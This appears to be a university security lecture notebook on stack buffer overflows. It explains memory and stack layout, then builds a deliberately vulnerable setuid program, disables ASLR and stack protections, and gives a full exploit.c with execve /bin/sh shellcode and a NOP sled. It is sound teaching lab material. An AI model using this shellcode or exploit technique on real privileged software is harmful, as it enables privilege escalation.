## <center> Buffer Overflow Attack </center>

### Program Memory Layout

When a program runs, it is loaded into memory.

A typical C program divides memory into five segments
- Text segment (also known as code segment): stores the executable code of the program (usually read-only)
- Data segment: stores **static/global** variables initialized in the program. 
  - static char s[] = "hello world";
  - static int a = 1;
- BSS (block stared by symbol) segment: stores uninitialized **static/global** variables. These variables will be initialized with zeros. 
- Heap: provides space for dynamic memory allocation (caused by `malloc`, `calloc`, `realloc`, `free`, etc). 
- Stack: is simple data structure with a LIFO (last-in-first-out access policy). Stack stores local variables defined inside functions, and data related to function calls (return address, arguments, etc)


- Sizes of text, data, and BSS segment are known as soon as compilation or assembly is completed.
- Stack and heap segments will grow and shrink during program execution.
  - Therefore, they tend to be configured such that they grow toward each other. 
  - The boundary between them is flexible.
  - Both can grow until all available memory is used. 

<center> <img src="figure/buffer-overflow/bo1.png" width="400"/>

In [1]:
%%writefile source/mem_layout.c
#include <stdlib.h>
#include <stdio.h>

int x = 100;
int main()
{
  // data stored on stack
  int   a=2;
  float b=2.5;
  static int y;

  // allocate memory on heap
  int *ptr = (int *) malloc(2*sizeof(int));
  
  // values 5 and 6 stored on heap
  ptr[0]=5;
  ptr[1]=6;

  // deallocate memory on heap	
  free(ptr);
 
  return 1;
}

Overwriting source/mem_layout.c


Run the followings:

```
$ gcc -W -Wall -c Computer-Security/source/mem_layout.c
$ gcc -o mem_layout mem_layout.o
$ size mem_layout mem_layout.o
```

Why don't we see stack and heap information?

In [2]:
%%writefile source/mem_layout_print.c
#include <stdlib.h>
#include <stdio.h>

int x = 100;
int main()
{
  int   a=2;
  double b=2.5;
  int   c=4;
  static int y;
  int *ptr = (int *) malloc(2*sizeof(int));  
  ptr[0]=5;
  ptr[1]=6;

  printf ("x is %d and is stored at %p\n", x, &x);
  printf ("a is %d and is stored at %p\n", a, &a);
  printf ("b is %f and is stored at %p\n", b, &b);
  printf ("c is %d and is stored at %p\n", c, &c);
  printf ("y is %d and is stored at %p\n", y, &y);
  printf ("ptr[0] is %d and is stored at %p\n", ptr[0], &ptr[0]);
  printf ("ptr[1] is %d and is stored at %p\n", ptr[1], &ptr[1]);

  // deallocate memory on heap	
  free(ptr);
  return 1;
}

Overwriting source/mem_layout_print.c


Slide Type
Run the followings:

```
$ gcc -o mem_layout_print Computer-Security/source/mem_layout_print.c
$ ./mem_layout_print
```

### Stack Memory Layout

- When a function is called, a block of memory called `stack frame` will be pushed onto the top of stack. A **stack frame** contains four regions:
    - Arguments that are passed to the function
    - Return address (the address of the instructions right after the function call
    - Previous frame pointer
    - Local variables of the function
- When the program first starts, the stack contains only one frame, that of the `main` function. 

<center> <img src="figure/buffer-overflow/bo2.png" width="400"/>

In [6]:
%%writefile source/stack_trace.c
#include<stdio.h>
static void display(int i, int *ptr);
    
int main(void) {
 int x = 5;
 int *xptr = &x;
 printf("In main():\n");
 printf("   x is %d and is stored at %p.\n", x, &x);
 printf("   xptr points to %p which holds %d.\n", xptr, *xptr);
 display(x, xptr);
 printf ("The display function has stopped");
 return 0;
}
   
void display(int z, int *zptr) {
  printf("In display():\n");
  printf("   z is %d and is stored at %p.\n", z, &z);
  printf("   zptr points to %p which holds %d.\n", zptr, *zptr);
}

Overwriting source/stack_trace.c


Run the followings:

```
$ gcc -g -o stack_trace Computer-Security/source/stack_trace.c
$ ./stack_trace
$ gdb stack_trace
gdb-peda$ 
```

In Class: Alternate between `run`, `break 10`, `backtrace`, `step`, and `n` to see how stack grows. `quit` to quit `gdb`.

```
gdb-peda$ run
gdb-peda$ break 10
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
```


<center> <img src="figure/buffer-overflow/bo3.png" width="400"/>

### Buffer Overflow Attack

- Memory copy happens in programming when data from one place (source) is duplicated to another place (destination). 
- Before copying can happen, memory needs to be allocated at the destination. 
- If the allocation fails to be sufficient, it will result in an overflow. 
- One of the oldest and most well-known attacks.

#### Why do we need to learn this vulnerability and attack?

- Can still be found buried in legacy or glue code from third party libraries as web sites get more complex and evolved.
- An important point of learning as you work through the theory and practice of this exploit:
  - C programming
  - C Assembler
  - Linux debugger using gdb
  - Engage in mathematics to understand the breaking points and the hex contents in memory in order to place an attack

**[Smashing the Stack, 2016](https://www.aap3recruitment.com/news/smashing-the-stack/14074/)**

**strcpy()**

In [7]:
%%writefile source/test_strcpy.c
#include <string.h>
#include <stdio.h>
void main(){
  char src[40] = "Hello World \0 Extra string";
  char dest[40];
  strcpy(dest, src);
  printf("%s",dest);
}

Overwriting source/test_strcpy.c


Compile and run `test_strcpy` in your terminal.
- What happens? Why is the string not copied properly?

In [8]:
%%writefile source/strcpy_overflow.c
#include <string.h>

void foo(char *str)
{
    char buffer[12];

    /* The following statement will result in buffer overflow */ 
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";    
    foo(str);

    return 1;
}

Overwriting source/strcpy_overflow.c


Run the followings:
```
$ gcc -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the followings:
```
$ gcc -z execstack -fno-stack-protector -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the gdb debugging sequence. Examing the frames at each backtrace. What happens to the last backtrace?
```
gdb-peda$ break 14
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
```

<center> <img src="figure/buffer-overflow/bo4.png" width="400"/>

- The region above the buffer includes critical values, including the return address and the previous frame pointer. 
- The consequences of a modified return address (due to buffer overflow) include:
  - The new address (virtual address) might not be mapped to any physical address, leading to an invalid return instruction and a crashed program. 
  - The address might be mapped to a physical address in protected system space, leading to a failed jump and a crashed program. 
  - The address might be mapped to a physical address that does not contain any valid instruction, leading to a failed return and a crashed program. 
  - **The address might be mapped to a physical address that happens to contain valid machine instructions, leading to a continuing program with logic different from the original program.**

#### Exploiting a Buffer Overflow Vulnerability

- By overflowing a buffer, we can cause the program to crash or run something else. 
- If the program is privileged, this means *something else* will be run with privilige, leading to potential privilege escalation for *something malicious*. 

In [9]:
%%writefile source/stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}


Overwriting source/stack.c


- Clearly, there is a buffer overflow issue.
- What needs to be store in `badfile` to expoit this issue?

<center> <img src="figure/buffer-overflow/bo5.png" width="500"/>

Disable countermeasures:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
Include the following flags with your gcc:
- `-z execstack`
- `-fno-stack-protector`

Run the followings:
```
$ gcc -o stack -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
$ echo "aaaa" > badfile
$ ./stack
$ echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" > badfile
$ ./stack
```

How do we know (guess) where the stack frame of `foo()` will be for us to find out where the malicious code is located (and hence set the relevant jump address)?
- Fixed starting address of the stack (before countermeasure). 
- The stack is shallow (good programming practice don't use deeply nested functions). 

Disable the address randomization and then run `mem_layout_print` to see if the addresses for the pointers in stack are changed?

<center> <img src="figure/buffer-overflow/bo6.png" width="500"/>

How can we find the return address without guessing?

Run the followings:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print $buffer
gdb-peda$ print ebp - buffer
gdb-peda$ quit
```

- What is 0x6C in decimal?

<center> <img src="figure/buffer-overflow/bo7.png" width="500"/>

The next body of code will need to be modified anytime you retest this program, after going through the debugging process to identify the correct stack position.

In [16]:
%%writefile source/exploit.c
/* exploit.c  */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax     */
    "\x50"                 /* pushl   %eax          */
    "\x68""//sh"           /* pushl   $0x68732f2f   */
    "\x68""/bin"           /* pushl   $0x6e69622f   */
    "\x89\xe3"             /* movl    %esp,%ebx     */
    "\x50"                 /* pushl   %eax          */
    "\x53"                 /* pushl   %ebx          */
    "\x89\xe1"             /* movl    %esp,%ecx     */
    "\x99"                 /* cdq                   */
    "\xb0\x0b"             /* movb    $0x0b,%al     */
    "\xcd\x80"             /* int     $0x80         */
;

void main(int argc, char **argv)
{
  char buffer[200];
  FILE *badfile;

  /* A. Initialize buffer with 0x90 (NOP instruction) */
  memset(&buffer, 0x90, 200);

  /* B. Fill the return address field with a candidate 
        entry point of the malicious code */
  *((long *) (buffer + 112)) = 0xbfffe908 + 0x80;
	
  // C. Place the shellcode towards the end of buffer
  memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));

  /* Save the contents to the file "badfile" */
  badfile = fopen("./badfile", "w");
  fwrite(buffer, 200, 1, badfile);
  fclose(badfile);
}

Writing source/exploit.c


Run the followings (after modify exploit.c accordingly)
```
$ rm badfile
$ gcc -o exploit Computer-Security/source/exploit.c
$ ./exploit
$ ./stack
```